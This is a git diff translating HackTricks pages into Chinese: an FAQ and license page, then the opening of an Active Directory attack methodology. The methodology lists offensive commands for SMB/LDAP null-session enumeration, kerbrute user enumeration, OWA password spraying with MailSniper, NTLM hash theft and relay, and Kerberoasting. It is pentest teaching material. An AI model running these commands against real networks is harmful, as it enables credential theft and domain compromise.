-Yes, you can, but **don't forget to mention the specific link(s)** where the content was taken from.
+可以，但 **不要忘记提及具体的链接**，内容是从哪里获取的。
 
 > [!TIP]
 >
-> - **How can I cite a page of HackTricks?**
-
-As long as the link **of** the page(s) were you took the information from appears it's enough.\
-If you need a bibtex you can use something like:
+> - **我该如何引用 HackTricks 的页面？**
 
+只要您引用的信息页面的 **链接** 出现即可。\
+如果您需要 bibtex，您可以使用类似的格式：
 ```latex
 @misc{hacktricks-bibtexing,
-  author = {"HackTricks Team" or the Authors name of the specific page/trick},
-  title = {Title of the Specific Page},
-  year = {Year of Last Update (check it at the end of the page)},
-  url = {\url{https://book.hacktricks.xyz/specific-page}},
+author = {"HackTricks Team" or the Authors name of the specific page/trick},
+title = {Title of the Specific Page},
+year = {Year of Last Update (check it at the end of the page)},
+url = {\url{https://book.hacktricks.xyz/specific-page}},
 }
 ```
+> [!WARNING]
+>
+> - **我可以在我的博客中复制所有HackTricks吗？**
+
+**我不建议这样做**。这对任何人都**没有好处**，因为所有的**内容已经在官方HackTricks书籍中免费公开**。
+
+如果你担心它会消失，只需在Github上分叉或下载，如我所说，它已经是免费的。
 
 > [!WARNING]
 >
-> - **Can I copy all HackTricks in my blog?**
+> - **你们为什么有赞助商？HackTricks书籍是商业用途吗？**
 
-**I would rather not**. Thats **not going to benefit anyone** as all the **content is already publicly available** in the official HackTricks books for free.
+第一个**HackTricks** **价值**是为**全世界**提供**免费的**黑客教育资源。HackTricks团队已经**投入了数千小时**来提供这些内容，再次强调，都是**免费的**。
 
-If you fear that it will disappear, just fork it in Github or download it, as I said it's already free.
+如果你认为HackTricks书籍是为了**商业目的**而制作的，你是**完全错误的**。
 
-> [!WARNING]
->
-> - **Why do you have sponsors? Are HackTricks books for commercial purposes?**
+我们有赞助商，因为即使所有内容都是免费的，我们希望**给社区提供欣赏我们工作的可能性**，如果他们愿意。因此，我们提供人们通过[**Github赞助商**](https://github.com/sponsors/carlospolop)捐赠给HackTricks的选项，以及**相关的网络安全公司**赞助HackTricks并在书中**放置一些广告**，这些**广告**总是放在**可见**但**不干扰学习**过程的地方，以便人们专注于内容。
 
-The first **HackTricks** **value** is to offer **FREE** hacking educational resources to **ALL** the world. The HackTricks team has **dedicated thousands of hours** to offer this content, again, for **FREE**.
-
-If you think HackTricks books are made for **commercial purposes** you are **COMPLETELY WRONG**.
-
-We have sponsors because, even if all the content is FREE, we want to **offer the community the possibility of appreciating our work** if they want to. Therefore, we offer people the option to donate to HackTricks via [**Github sponsors**](https://github.com/sponsors/carlospolop), and **relevant cybersecurity companies** to sponsor HackTricks and to **have some ads** in the book being the **ads** always placed in places where make them **visible** but **doesn't disturb the learning** process if someone focus in the content.
-
-You won't find HackTricks filled with annoying ads like other blogs with much less content than HackTricks, because HackTricks is not made for commercial purposes.
+你不会发现HackTricks充满了烦人的广告，就像其他内容远不如HackTricks的博客，因为HackTricks不是为了商业目的而制作的。
 
 > [!CAUTION]
 >
-> - **What should I do if some HackTricks page is based on my blog post but it isn't referenced?**
+> - **如果某个HackTricks页面基于我的博客文章但没有引用，我该怎么办？**
 
-**We are very sorry. This shouldn't have happened**. Please, let us know via Github issues, Twitter, Discord... the link of the HackTricks page with the content and the link of your blog and **we will check it and add it ASAP**.
+**我们非常抱歉。这不应该发生**。请通过Github问题、Twitter、Discord等告知我们HackTricks页面的链接和你的博客链接，**我们会检查并尽快添加**。
 
 > [!CAUTION]
 >
-> - **What should I do if there is content from my blog in HackTricks and I don't want it there?**
+> - **如果HackTricks中有我博客的内容而我不想要它，我该怎么办？**
 
-Note that having links to your page in HackTricks:
+请注意，在HackTricks中有链接到你的页面：
 
-- Improve your **SEO**
-- The content gets **translated to more than 15 languages** making possible for more people to access this content
-- **HackTricks encourages** people to **check your page** (several people has mentioned us that since some page of them is in HackTricks they receive more visits)
+- 改善你的**SEO**
+- 内容被**翻译成超过15种语言**，使更多人能够访问这些内容
+- **HackTricks鼓励**人们**查看你的页面**（有几个人提到，自从他们的某个页面在HackTricks中，他们的访问量增加了）
 
-However, If you still want the content of your blog to be removed from HackTricks just let us know and we will definitely **remove every link to your blog**, and any content based on it.
+然而，如果你仍然希望从HackTricks中删除你博客的内容，请告知我们，我们将**删除所有指向你博客的链接**，以及任何基于它的内容。
 
 > [!CAUTION]
 >
-> - **What should I do if I find copy-pasted content in HackTricks?**
+> - **如果我在HackTricks中发现复制粘贴的内容，我该怎么办？**
 
-We always **give the original authors all the credits**. If you find a page with copy-pasted content without original source referenced, let us know and we will either **remove it**, **add the link before the text**, or **rewrite it adding the link**.
+我们始终**给予原作者所有的信用**。如果你发现某个页面有复制粘贴的内容而没有引用原始来源，请告知我们，我们将**删除它**、**在文本前添加链接**，或**重写并添加链接**。
 
 ## LICENSE
 
-Copyright © All rights reserved unless otherwise specified.
+Copyright © 保留所有权利，除非另有说明。
 
 #### License Summary:
 
-- Attribution: You are free to:
-  - Share — copy and redistribute the material in any medium or format.
-  - Adapt — remix, transform, and build upon the material.
+- Attribution: 你可以自由地：
+- Share — 以任何媒介或格式复制和重新分发材料。
+- Adapt — 混合、转变和基于材料进行构建。
 
 #### Additional Terms:
 
-- Third-Party Content: Some parts of this blog/book may include content from other sources, such as excerpts from other blogs or publications. The use of such content is done under the principles of fair use or with explicit permission from the respective copyright holders. Please refer to the original sources for specific licensing information regarding third-party content.
-- Authorship: The original content authored by HackTricks is subject to the terms of this license. You are encouraged to attribute this work to the author when sharing or adapting it.
+- Third-Party Content: 本博客/书籍的某些部分可能包含来自其他来源的内容，例如其他博客或出版物的摘录。使用此类内容是基于合理使用原则或获得相关版权持有者的明确许可。有关第三方内容的具体许可信息，请参考原始来源。
+- Authorship: HackTricks创作的原始内容受此许可条款的约束。鼓励在分享或改编时将此作品归功于作者。
 
 #### Exemptions:
 
-- Commercial Use: For inquiries regarding commercial use of this content, please contact me.
+- Commercial Use: 有关此内容商业使用的查询，请与我联系。
 
-This license does not grant any trademark or branding rights in relation to the content. All trademarks and branding featured in this blog/book are the property of their respective owners.
+此许可不授予与内容相关的任何商标或品牌权利。所有在本博客/书籍中出现的商标和品牌均为其各自所有者的财产。
 
-**By accessing or using HackTricks, you agree to abide by the terms of this license. If you do not agree with these terms, please, do not access this website.**
+**通过访问或使用HackTricks，你同意遵守此许可的条款。如果你不同意这些条款，请不要访问此网站。**
 
-## **Disclaimer**
+## **免责声明**
 
 > [!CAUTION]
-> This book, 'HackTricks,' is intended for educational and informational purposes only. The content within this book is provided on an 'as is' basis, and the authors and publishers make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability, or availability of the information, products, services, or related graphics contained within this book. Any reliance you place on such information is therefore strictly at your own risk.
+> 本书《HackTricks》仅用于教育和信息目的。书中的内容按“现状”提供，作者和出版商不对书中包含的信息、产品、服务或相关图形的完整性、准确性、可靠性、适用性或可用性作出任何明示或暗示的陈述或保证。因此，你对这些信息的任何依赖均严格自担风险。
 >
-> The authors and publishers shall in no event be liable for any loss or damage, including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of, or in connection with, the use of this book.
+> 作者和出版商在任何情况下均不对因使用本书而导致的任何损失或损害承担责任，包括但不限于间接或后果性损失或损害，或因数据或利润损失而产生的任何损失或损害。
 >
-> Furthermore, the techniques and tips described in this book are provided for educational and informational purposes only, and should not be used for any illegal or malicious activities. The authors and publishers do not condone or support any illegal or unethical activities, and any use of the information contained within this book is at the user's own risk and discretion.
+> 此外，本书中描述的技术和技巧仅用于教育和信息目的，不应用于任何非法或恶意活动。作者和出版商不支持或纵容任何非法或不道德的活动，使用本书中包含的信息的任何行为均由用户自行承担风险和判断。
 >
-> The user is solely responsible for any actions taken based on the information contained within this book, and should always seek professional advice and assistance when attempting to implement any of the techniques or tips described herein.
+> 用户对基于本书中包含的信息采取的任何行动负全部责任，并应在尝试实施本书中描述的任何技术或技巧时始终寻求专业建议和帮助。
 >
-> By using this book, the user agrees to release the authors and publishers from any and all liability and responsibility for any damages, losses, or harm that may result from the use of this book or any of the information contained within it.
+> 使用本书即表示用户同意解除作者和出版商对因使用本书或其中任何信息而可能导致的任何损害、损失或伤害的责任和责任。
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/README.md b/src/windows-hardening/active-directory-methodology/README.md
index bf83630d5..62fb3526e 100644
--- a/src/windows-hardening/active-directory-methodology/README.md
+++ b/src/windows-hardening/active-directory-methodology/README.md
@@ -1,84 +1,83 @@
-# Active Directory Methodology
+# Active Directory 方法论
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic overview
+## 基本概述
 
-**Active Directory** serves as a foundational technology, enabling **network administrators** to efficiently create and manage **domains**, **users**, and **objects** within a network. It is engineered to scale, facilitating the organization of an extensive number of users into manageable **groups** and **subgroups**, while controlling **access rights** at various levels.
+**Active Directory** 作为基础技术，使 **网络管理员** 能够高效地创建和管理网络中的 **域**、**用户** 和 **对象**。它被设计为可扩展，便于将大量用户组织成可管理的 **组** 和 **子组**，同时在不同级别上控制 **访问权限**。
 
-The structure of **Active Directory** is comprised of three primary layers: **domains**, **trees**, and **forests**. A **domain** encompasses a collection of objects, such as **users** or **devices**, sharing a common database. **Trees** are groups of these domains linked by a shared structure, and a **forest** represents the collection of multiple trees, interconnected through **trust relationships**, forming the uppermost layer of the organizational structure. Specific **access** and **communication rights** can be designated at each of these levels.
+**Active Directory** 的结构由三个主要层次组成：**域**、**树** 和 **森林**。一个 **域** 包含一组对象，如 **用户** 或 **设备**，共享一个公共数据库。**树** 是这些域的组，彼此通过共享结构连接，而 **森林** 代表多个树的集合，通过 **信任关系** 互联，形成组织结构的最上层。可以在每个层次上指定特定的 **访问** 和 **通信权限**。
 
-Key concepts within **Active Directory** include:
+**Active Directory** 中的关键概念包括：
 
-1. **Directory** – Houses all information pertaining to Active Directory objects.
-2. **Object** – Denotes entities within the directory, including **users**, **groups**, or **shared folders**.
-3. **Domain** – Serves as a container for directory objects, with the capability for multiple domains to coexist within a **forest**, each maintaining its own object collection.
-4. **Tree** – A grouping of domains that share a common root domain.
-5. **Forest** – The pinnacle of organizational structure in Active Directory, composed of several trees with **trust relationships** among them.
+1. **目录** – 存储与 Active Directory 对象相关的所有信息。
+2. **对象** – 指目录中的实体，包括 **用户**、**组** 或 **共享文件夹**。
+3. **域** – 作为目录对象的容器，多个域可以在一个 **森林** 中共存，每个域维护自己的对象集合。
+4. **树** – 一组共享公共根域的域。
+5. **森林** – Active Directory 中组织结构的顶点，由多个树组成，彼此之间有 **信任关系**。
 
-**Active Directory Domain Services (AD DS)** encompasses a range of services critical for the centralized management and communication within a network. These services comprise:
+**Active Directory 域服务 (AD DS)** 包含一系列对网络内集中管理和通信至关重要的服务。这些服务包括：
 
-1. **Domain Services** – Centralizes data storage and manages interactions between **users** and **domains**, including **authentication** and **search** functionalities.
-2. **Certificate Services** – Oversees the creation, distribution, and management of secure **digital certificates**.
-3. **Lightweight Directory Services** – Supports directory-enabled applications through the **LDAP protocol**.
-4. **Directory Federation Services** – Provides **single-sign-on** capabilities to authenticate users across multiple web applications in a single session.
-5. **Rights Management** – Assists in safeguarding copyright material by regulating its unauthorized distribution and use.
-6. **DNS Service** – Crucial for the resolution of **domain names**.
+1. **域服务** – 集中数据存储并管理 **用户** 和 **域** 之间的交互，包括 **身份验证** 和 **搜索** 功能。
+2. **证书服务** – 负责安全 **数字证书** 的创建、分发和管理。
+3. **轻量级目录服务** – 通过 **LDAP 协议** 支持目录启用的应用程序。
+4. **目录联合服务** – 提供 **单点登录** 功能，以在单个会话中对多个 Web 应用程序进行用户身份验证。
+5. **权限管理** – 通过规范其未经授权的分发和使用来帮助保护版权材料。
+6. **DNS 服务** – 对 **域名** 的解析至关重要。
 
-For a more detailed explanation check: [**TechTerms - Active Directory Definition**](https://techterms.com/definition/active_directory)
+有关更详细的解释，请查看：[**TechTerms - Active Directory 定义**](https://techterms.com/definition/active_directory)
 
-### **Kerberos Authentication**
+### **Kerberos 身份验证**
 
-To learn how to **attack an AD** you need to **understand** really good the **Kerberos authentication process**.\
-[**Read this page if you still don't know how it works.**](kerberos-authentication.md)
+要学习如何 **攻击 AD**，您需要非常好地 **理解** **Kerberos 身份验证过程**。\
+[**如果您仍然不知道它是如何工作的，请阅读此页面。**](kerberos-authentication.md)
 
-## Cheat Sheet
+## 备忘单
 
-You can take a lot to [https://wadcoms.github.io/](https://wadcoms.github.io) to have a quick view of which commands you can run to enumerate/exploit an AD.
+您可以访问 [https://wadcoms.github.io/](https://wadcoms.github.io) 快速查看可以运行的命令，以枚举/利用 AD。
 
-## Recon Active Directory (No creds/sessions)
+## 侦察 Active Directory（无凭据/会话）
 
-If you just have access to an AD environment but you don't have any credentials/sessions you could:
+如果您仅访问 AD 环境，但没有任何凭据/会话，您可以：
 
-- **Pentest the network:**
-  - Scan the network, find machines and open ports and try to **exploit vulnerabilities** or **extract credentials** from them (for example, [printers could be very interesting targets](ad-information-in-printers.md).
-  - Enumerating DNS could give information about key servers in the domain as web, printers, shares, vpn, media, etc.
-    - `gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt`
-  - Take a look to the General [**Pentesting Methodology**](../../generic-methodologies-and-resources/pentesting-methodology.md) to find more information about how to do this.
-- **Check for null and Guest access on smb services** (this won't work on modern Windows versions):
-  - `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>`
-  - `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>`
-  - `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //`
-  - A more detailed guide on how to enumerate a SMB server can be found here:
+- **渗透测试网络：**
+- 扫描网络，查找机器和开放端口，并尝试 **利用漏洞** 或 **提取凭据**（例如，[打印机可能是非常有趣的目标](ad-information-in-printers.md)）。
+- 枚举 DNS 可能会提供有关域中关键服务器的信息，如 Web、打印机、共享、VPN、媒体等。
+- `gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt`
+- 查看一般的 [**渗透测试方法论**](../../generic-methodologies-and-resources/pentesting-methodology.md)，以获取有关如何执行此操作的更多信息。
+- **检查 smb 服务上的空和访客访问**（这在现代 Windows 版本上不起作用）：
+- `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>`
+- `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>`
+- `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //`
+- 有关如何枚举 SMB 服务器的更详细指南可以在这里找到：
 
 {{#ref}}
 ../../network-services-pentesting/pentesting-smb/
 {{#endref}}
 
-- **Enumerate Ldap**
-  - `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>`
-  - A more detailed guide on how to enumerate LDAP can be found here (pay **special attention to the anonymous access**):
+- **枚举 Ldap**
+- `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>`
+- 有关如何枚举 LDAP 的更详细指南可以在这里找到（请 **特别注意匿名访问**）：
 
 {{#ref}}
 ../../network-services-pentesting/pentesting-ldap.md
 {{#endref}}
 
-- **Poison the network**
-  - Gather credentials [**impersonating services with Responder**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
-  - Access host by [**abusing the relay attack**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)
-  - Gather credentials **exposing** [**fake UPnP services with evil-S**](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
-- [**OSINT**](https://book.hacktricks.xyz/external-recon-methodology):
-  - Extract usernames/names from internal documents, social media, services (mainly web) inside the domain environments and also from the publicly available.
-  - If you find the complete names of company workers, you could try different AD **username conventions (**[**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)). The most common conventions are: _NameSurname_, _Name.Surname_, _NamSur_ (3letters of each), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, 3 _random letters and 3 random numbers_ (abc123).
-  - Tools:
-    - [w0Tx/generate-ad-username](https://github.com/w0Tx/generate-ad-username)
-    - [urbanadventurer/username-anarchy](https://github.com/urbanadventurer/username-anarchy)
+- **毒化网络**
+- 收集凭据 [**通过 Responder 冒充服务**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
+- 通过 [**滥用中继攻击**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) 访问主机
+- 收集凭据 **暴露** [**假 UPnP 服务与 evil-S**](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
+- [**OSINT**](https://book.hacktricks.xyz/external-recon-methodology)：
+- 从内部文档、社交媒体、服务（主要是 Web）中提取用户名/姓名，以及从公开可用的信息中提取。
+- 如果您找到公司员工的完整姓名，您可以尝试不同的 AD **用户名约定**（**[阅读此文](https://activedirectorypro.com/active-directory-user-naming-convention/)**）。最常见的约定是：_NameSurname_、_Name.Surname_、_NamSur_（每个 3 个字母）、_Nam.Sur_、_NSurname_、_N.Surname_、_SurnameName_、_Surname.Name_、_SurnameN_、_Surname.N_、3 个 _随机字母和 3 个随机数字_（abc123）。
+- 工具：
+- [w0Tx/generate-ad-username](https://github.com/w0Tx/generate-ad-username)
+- [urbanadventurer/username-anarchy](https://github.com/urbanadventurer/username-anarchy)
 
-### User enumeration
-
-- **Anonymous SMB/LDAP enum:** Check the [**pentesting SMB**](../../network-services-pentesting/pentesting-smb/) and [**pentesting LDAP**](../../network-services-pentesting/pentesting-ldap.md) pages.
-- **Kerbrute enum**: When an **invalid username is requested** the server will respond using the **Kerberos error** code _KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN_, allowing us to determine that the username was invalid. **Valid usernames** will illicit either the **TGT in a AS-REP** response or the error _KRB5KDC_ERR_PREAUTH_REQUIRED_, indicating that the user is required to perform pre-authentication.
+### 用户枚举
 
+- **匿名 SMB/LDAP 枚举：** 检查 [**渗透测试 SMB**](../../network-services-pentesting/pentesting-smb/) 和 [**渗透测试 LDAP**](../../network-services-pentesting/pentesting-ldap.md) 页面。
+- **Kerbrute 枚举**：当请求 **无效用户名** 时，服务器将使用 **Kerberos 错误** 代码 _KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN_ 响应，从而使我们能够确定用户名无效。**有效用户名** 将引发 **AS-REP** 响应中的 **TGT** 或错误 _KRB5KDC_ERR_PREAUTH_REQUIRED_，指示用户需要进行预身份验证。
 ```bash
 ./kerbrute_linux_amd64 userenum -d lab.ropnop.com --dc 10.10.10.10 usernames.txt #From https://github.com/ropnop/kerbrute/releases
 
@@ -89,11 +88,9 @@ msf> use auxiliary/gather/kerberos_enumusers
 
 crackmapexec smb dominio.es  -u '' -p '' --users | awk '{print $4}' | uniq
 ```
+- **OWA (Outlook Web Access) 服务器**
 
-- **OWA (Outlook Web Access) Server**
-
-If you found one of these servers in the network you can also perform **user enumeration against it**. For example, you could use the tool [**MailSniper**](https://github.com/dafthack/MailSniper):
-
+如果您在网络中发现了这些服务器，您还可以对其执行 **用户枚举**。例如，您可以使用工具 [**MailSniper**](https://github.com/dafthack/MailSniper)：
 ```bash
 ipmo C:\Tools\MailSniper\MailSniper.ps1
 # Get info about the domain
@@ -105,102 +102,100 @@ Invoke-PasswordSprayOWA -ExchHostname [ip] -UserList .\valid.txt -Password Summe
 # Get addresses list from the compromised mail
 Get-GlobalAddressList -ExchHostname [ip] -UserName [domain]\[username] -Password Summer2021 -OutFile gal.txt
 ```
-
 > [!WARNING]
-> You can find lists of usernames in [**this github repo**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names) \*\*\*\* and this one ([**statistically-likely-usernames**](https://github.com/insidetrust/statistically-likely-usernames)).
+> 你可以在 [**这个 github 仓库**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names) 和这个 ([**statistically-likely-usernames**](https://github.com/insidetrust/statistically-likely-usernames)) 找到用户名列表。
 >
-> However, you should have the **name of the people working on the company** from the recon step you should have performed before this. With the name and surname you could used the script [**namemash.py**](https://gist.github.com/superkojiman/11076951) to generate potential valid usernames.
+> 然而，你应该从之前执行的侦查步骤中获得 **公司员工的姓名**。有了名字和姓氏，你可以使用脚本 [**namemash.py**](https://gist.github.com/superkojiman/11076951) 来生成潜在的有效用户名。
 
-### Knowing one or several usernames
+### 知道一个或多个用户名
 
-Ok, so you know you have already a valid username but no passwords... Then try:
+好的，所以你知道你已经有一个有效的用户名，但没有密码……那么尝试：
 
-- [**ASREPRoast**](asreproast.md): If a user **doesn't have** the attribute _DONT_REQ_PREAUTH_ you can **request a AS_REP message** for that user that will contain some data encrypted by a derivation of the password of the user.
-- [**Password Spraying**](password-spraying.md): Let's try the most **common passwords** with each of the discovered users, maybe some user is using a bad password (keep in mind the password policy!).
-  - Note that you can also **spray OWA servers** to try to get access to the users mail servers.
+- [**ASREPRoast**](asreproast.md)：如果用户 **没有** 属性 _DONT_REQ_PREAUTH_，你可以 **请求该用户的 AS_REP 消息**，其中将包含一些由用户密码的派生加密的数据。
+- [**Password Spraying**](password-spraying.md)：让我们尝试每个发现用户的 **常见密码**，也许某个用户使用了一个糟糕的密码（记住密码策略！）。
+- 请注意，你也可以 **喷洒 OWA 服务器** 来尝试访问用户的邮件服务器。
 
 {{#ref}}
 password-spraying.md
 {{#endref}}
 
-### LLMNR/NBT-NS Poisoning
+### LLMNR/NBT-NS 中毒
 
-You might be able to **obtain** some challenge **hashes** to crack **poisoning** some protocols of the **network**:
+你可能能够 **获取** 一些挑战 **哈希** 来破解 **中毒** 一些 **网络** 协议：
 
 {{#ref}}
 ../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
 {{#endref}}
 
-### NTML Relay
+### NTML 中继
 
-If you have managed to enumerate the active directory you will have **more emails and a better understanding of the network**. You might be able to to force NTML [**relay attacks**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) \*\*\*\* to get access to the AD env.
+如果你已经成功枚举了活动目录，你将拥有 **更多的电子邮件和对网络的更好理解**。你可能能够强制 NTML [**中继攻击**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) 来获取对 AD 环境的访问。
 
-### Steal NTLM Creds
+### 窃取 NTLM 凭证
 
-If you can **access other PCs or shares** with the **null or guest user** you could **place files** (like a SCF file) that if somehow accessed will t**rigger an NTML authentication against you** so you can **steal** the **NTLM challenge** to crack it:
+如果你可以使用 **null 或访客用户** **访问其他 PC 或共享**，你可以 **放置文件**（如 SCF 文件），如果以某种方式被访问，将会 **触发对你的 NTML 认证**，这样你就可以 **窃取** **NTLM 挑战** 进行破解：
 
 {{#ref}}
 ../ntlm/places-to-steal-ntlm-creds.md
 {{#endref}}
 
-## Enumerating Active Directory WITH credentials/session
+## 使用凭证/会话枚举活动目录
 
-For this phase you need to have **compromised the credentials or a session of a valid domain account.** If you have some valid credentials or a shell as a domain user, **you should remember that the options given before are still options to compromise other users**.
+在这个阶段，你需要 **获取有效域账户的凭证或会话。** 如果你有一些有效的凭证或作为域用户的 shell，**你应该记住之前给出的选项仍然是妥协其他用户的选项**。
 
-Before start the authenticated enumeration you should know what is the **Kerberos double hop problem.**
+在开始经过身份验证的枚举之前，你应该知道 **Kerberos 双跳问题**。
 
 {{#ref}}
 kerberos-double-hop-problem.md
 {{#endref}}
 
-### Enumeration
+### 枚举
 
-Having compromised an account is a **big step to start compromising the whole domain**, because you are going to be able to start the **Active Directory Enumeration:**
+成功妥协一个账户是 **开始妥协整个域的一个重要步骤**，因为你将能够开始 **活动目录枚举：**
 
-Regarding [**ASREPRoast**](asreproast.md) you can now find every possible vulnerable user, and regarding [**Password Spraying**](password-spraying.md) you can get a **list of all the usernames** and try the password of the compromised account, empty passwords and new promising passwords.
+关于 [**ASREPRoast**](asreproast.md)，你现在可以找到每个可能的易受攻击用户，关于 [**Password Spraying**](password-spraying.md)，你可以获得 **所有用户名的列表** 并尝试妥协账户的密码、空密码和新的有前景的密码。
 
-- You could use the [**CMD to perform a basic recon**](../basic-cmd-for-pentesters.md#domain-info)
-- You can also use [**powershell for recon**](../basic-powershell-for-pentesters/) which will be stealthier
-- You ca also [**use powerview**](../basic-powershell-for-pentesters/powerview.md) to extract more detailed information
-- Another amazing tool for recon in an active directory is [**BloodHound**](bloodhound.md). It is **not very stealthy** (depending on the collection methods you use), but **if you don't care** about that, you should totally give it a try. Find where users can RDP, find path to other groups, etc.
-  - **Other automated AD enumeration tools are:** [**AD Explorer**](bloodhound.md#ad-explorer)**,** [**ADRecon**](bloodhound.md#adrecon)**,** [**Group3r**](bloodhound.md#group3r)**,** [**PingCastle**](bloodhound.md#pingcastle)**.**
-- [**DNS records of the AD**](ad-dns-records.md) as they might contain interesting information.
-- A **tool with GUI** that you can use to enumerate the directory is **AdExplorer.exe** from **SysInternal** Suite.
-- You can also search in the LDAP database with **ldapsearch** to look for credentials in fields _userPassword_ & _unixUserPassword_, or even for _Description_. cf. [Password in AD User comment on PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#password-in-ad-user-comment) for other methods.
-- If you are using **Linux**, you could also enumerate the domain using [**pywerview**](https://github.com/the-useless-one/pywerview).
-- You could also try automated tools as:
-  - [**tomcarver16/ADSearch**](https://github.com/tomcarver16/ADSearch)
-  - [**61106960/adPEAS**](https://github.com/61106960/adPEAS)
-- **Extracting all domain users**
+- 你可以使用 [**CMD 进行基本侦查**](../basic-cmd-for-pentesters.md#domain-info)
+- 你也可以使用 [**powershell 进行侦查**](../basic-powershell-for-pentesters/)，这将更加隐蔽
+- 你还可以 [**使用 powerview**](../basic-powershell-for-pentesters/powerview.md) 来提取更详细的信息
+- 另一个在活动目录中进行侦查的惊人工具是 [**BloodHound**](bloodhound.md)。它 **不是很隐蔽**（取决于你使用的收集方法），但 **如果你不在乎**，你绝对应该试试。找出用户可以 RDP 的地方，找到其他组的路径等。
+- **其他自动化 AD 枚举工具有：** [**AD Explorer**](bloodhound.md#ad-explorer)**,** [**ADRecon**](bloodhound.md#adrecon)**,** [**Group3r**](bloodhound.md#group3r)**,** [**PingCastle**](bloodhound.md#pingcastle)**.**
+- [**AD 的 DNS 记录**](ad-dns-records.md)，因为它们可能包含有趣的信息。
+- 你可以使用 **AdExplorer.exe** 这个 **GUI 工具** 来枚举目录，来自 **SysInternal** 套件。
+- 你还可以使用 **ldapsearch** 在 LDAP 数据库中搜索凭证，查找字段 _userPassword_ 和 _unixUserPassword_，甚至是 _Description_。请参阅 [PayloadsAllTheThings 上的 AD 用户注释中的密码](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#password-in-ad-user-comment) 以获取其他方法。
+- 如果你使用 **Linux**，你也可以使用 [**pywerview**](https://github.com/the-useless-one/pywerview) 枚举域。
+- 你还可以尝试自动化工具，如：
+- [**tomcarver16/ADSearch**](https://github.com/tomcarver16/ADSearch)
+- [**61106960/adPEAS**](https://github.com/61106960/adPEAS)
+- **提取所有域用户**
 
-  It's very easy to obtain all the domain usernames from Windows (`net user /domain` ,`Get-DomainUser` or `wmic useraccount get name,sid`). In Linux, you can use: `GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username` or `enum4linux -a -u "user" -p "password" <DC IP>`
+从 Windows 获取所有域用户名非常简单（`net user /domain`，`Get-DomainUser` 或 `wmic useraccount get name,sid`）。在 Linux 中，你可以使用：`GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username` 或 `enum4linux -a -u "user" -p "password" <DC IP>`
 
-> Even if this Enumeration section looks small this is the most important part of all. Access the links (mainly the one of cmd, powershell, powerview and BloodHound), learn how to enumerate a domain and practice until you feel comfortable. During an assessment, this will be the key moment to find your way to DA or to decide that nothing can be done.
+> 即使这个枚举部分看起来很小，这也是最重要的部分。访问链接（主要是 cmd、powershell、powerview 和 BloodHound 的链接），学习如何枚举域并练习，直到你感到舒适。在评估期间，这将是找到通往 DA 的关键时刻，或者决定没有什么可以做的。
 
 ### Kerberoast
 
-Kerberoasting involves obtaining **TGS tickets** used by services tied to user accounts and cracking their encryption—which is based on user passwords—**offline**.
+Kerberoasting 涉及获取 **TGS 票证**，这些票证由与用户账户相关的服务使用，并破解其加密——这基于用户密码——**离线**。
 
-More about this in:
+更多信息请参见：
 
 {{#ref}}
 kerberoast.md
 {{#endref}}
 
-### Remote connexion (RDP, SSH, FTP, Win-RM, etc)
+### 远程连接 (RDP, SSH, FTP, Win-RM 等)
 
-Once you have obtained some credentials you could check if you have access to any **machine**. For that matter, you could use **CrackMapExec** to attempt connecting on several servers with different protocols, accordingly to your ports scans.
+一旦你获得了一些凭证，你可以检查是否可以访问任何 **机器**。为此，你可以使用 **CrackMapExec** 尝试通过不同协议连接到多个服务器，具体取决于你的端口扫描结果。
 
-### Local Privilege Escalation
+### 本地权限提升
 
